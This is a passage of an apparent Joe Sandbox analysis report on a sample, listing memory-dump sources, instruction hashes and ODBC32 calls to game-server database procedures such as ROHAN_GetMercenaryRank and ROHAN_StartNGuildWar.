                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelIndunRestrictInfo2]}
                                                                                      • API String ID: 0-3221934154
                                                                                      • Opcode ID: 20855343de9aac3f81e9e7d2e44dc4c3a3377d2a39f213209ca8de91f4b05dd1
                                                                                      • Instruction ID: 97b5e04f4ea5f6813bb58fed8d7f8ac9ee3361376f13991c64ba923f5330ce66
                                                                                      • Opcode Fuzzy Hash: 20855343de9aac3f81e9e7d2e44dc4c3a3377d2a39f213209ca8de91f4b05dd1
                                                                                      • Instruction Fuzzy Hash: 62F012B5A45218ABDB20CF44CC41FEA7374FF44714F508289F618AA2C4D675AD60CF8D
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMercenaryRank]},000000FD), ref: 0043D86D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043D8AC
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMercenaryRank]}, xrefs: 0043D864
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMercenaryRank]}
                                                                                      • API String ID: 0-3944135852
                                                                                      • Opcode ID: 44979cf419997a23fd7d2f9b813ea63d5fade232e2bbf99b100f121c2b4f17ec
                                                                                      • Instruction ID: d7149ccc0c77ea909ecb74ff8d50d19d34b3c83df535ebb3316859b959577c29
                                                                                      • Opcode Fuzzy Hash: 44979cf419997a23fd7d2f9b813ea63d5fade232e2bbf99b100f121c2b4f17ec
                                                                                      • Instruction Fuzzy Hash: 4DF09CB0A48259A7EB20CF04CC01FDA7370FB44714F108289F6945A2C4C7F56D809F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_StartNGuildWar]},000000FD), ref: 00434922
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434961
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_StartNGuildWar]}, xrefs: 00434919
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_StartNGuildWar]}
                                                                                      • API String ID: 0-1479261631
                                                                                      • Opcode ID: 1fc40f7ed8cbb2b59514cc3389fcec40121c342f2686c8c7ed4c9ade617154eb
                                                                                      • Instruction ID: 96e459aaa06f11ed12d519b7c9c3a980de31973a2a38d0aebc5adf5726672250
                                                                                      • Opcode Fuzzy Hash: 1fc40f7ed8cbb2b59514cc3389fcec40121c342f2686c8c7ed4c9ade617154eb
                                                                                      • Instruction Fuzzy Hash: 1AF0FFB1B44318BFEB10CF44CC42F9A7374EB46724F104289F6546A6C0D7756950CF5A
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DeleteMailReset]},000000FD), ref: 0043FA2E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043FA6D
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DeleteMailReset]}, xrefs: 0043FA25
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DeleteMailReset]}
                                                                                      • API String ID: 0-1769043751
                                                                                      • Opcode ID: 66b28af3914b8df7665b6f0b2eb389c222fe2593b4ffa34071f8ec2059301532
                                                                                      • Instruction ID: c9392bd8176c8c5517fd232f8b58d51b36448f14b7c07223bcc9c0b5178e8bdb
                                                                                      • Opcode Fuzzy Hash: 66b28af3914b8df7665b6f0b2eb389c222fe2593b4ffa34071f8ec2059301532
                                                                                      • Instruction Fuzzy Hash: D3F0FFB5A40219ABEB14CF44CC42FE97374EB44755F108289F724AA2C1D67569509B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetNGuildWarWin]},000000FD), ref: 00435038
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435077
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetNGuildWarWin]}, xrefs: 0043502F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetNGuildWarWin]}
                                                                                      • API String ID: 0-2614652633
                                                                                      • Opcode ID: 25ad2941cbbe611e052fad0b5ecbfefd1a3914d7d57c168d7fd64d04ed694c3d
                                                                                      • Instruction ID: 77c3a772e90731e8aa9f2001a4f7159215f377e10ce31f3884c07faca174c6f3
                                                                                      • Opcode Fuzzy Hash: 25ad2941cbbe611e052fad0b5ecbfefd1a3914d7d57c168d7fd64d04ed694c3d
                                                                                      • Instruction Fuzzy Hash: B0F0FEB1B4421CABEF24DF44CD62FEA7334EB40718F604289F7186E2C0D7B56A509B99
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_LoadTimeEvent]},000000FD), ref: 004350F8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435137
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_LoadTimeEvent]}, xrefs: 004350EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_LoadTimeEvent]}
                                                                                      • API String ID: 0-4281071345
                                                                                      • Opcode ID: 10c503e8898bf0da07306f581dc6376b9e481788169a2a4f8cb87b92e25b7ba6
                                                                                      • Instruction ID: a4f25529ce94a0bf0d65047b1936b160099cb6cb948cae79301d92562b9993ff
                                                                                      • Opcode Fuzzy Hash: 10c503e8898bf0da07306f581dc6376b9e481788169a2a4f8cb87b92e25b7ba6
                                                                                      • Instruction Fuzzy Hash: 61F012B1A44218ABEB20DF44CD42FAA7374EB48728F204289F7146E2C0D7B5AD509B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetAllTimeEvent]},000000FD), ref: 00435098
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004350D7
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetAllTimeEvent]}, xrefs: 0043508F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetAllTimeEvent]}
                                                                                      • API String ID: 0-2436004976
                                                                                      • Opcode ID: 106da9daae740544c1bab44084a3ee6f69979414e4cd182b9e724a046f34f83f
                                                                                      • Instruction ID: 34619acaab0c9ac44e91d6154d27058d75947f7e0ec49a494a1d8e4f96191622
                                                                                      • Opcode Fuzzy Hash: 106da9daae740544c1bab44084a3ee6f69979414e4cd182b9e724a046f34f83f
                                                                                      • Instruction Fuzzy Hash: 84F05EB1B84218ABEB20DF44CC22FAA7734EB44728F508289F7142E2C0D7B569418F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetItemControlList]},000000FD), ref: 00438202
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438244
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetItemControlList]}, xrefs: 004381F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetItemControlList]}
                                                                                      • API String ID: 0-464021390
                                                                                      • Opcode ID: cdd977e24a9058a08fac448970ed40b7c3eac23ea8eae73bead6fb79af6bed7d
                                                                                      • Instruction ID: b2a981f6a2a57cc417bc5f7bebab84b5a237cad0eebee88353b7d6d8eb043adb
                                                                                      • Opcode Fuzzy Hash: cdd977e24a9058a08fac448970ed40b7c3eac23ea8eae73bead6fb79af6bed7d
                                                                                      • Instruction Fuzzy Hash: 5BF0FBB4654218B7DF14DF84CC41F5A7335EB40714F20838BF6182A2C4D6B57D508F68
                                                                                      APIs
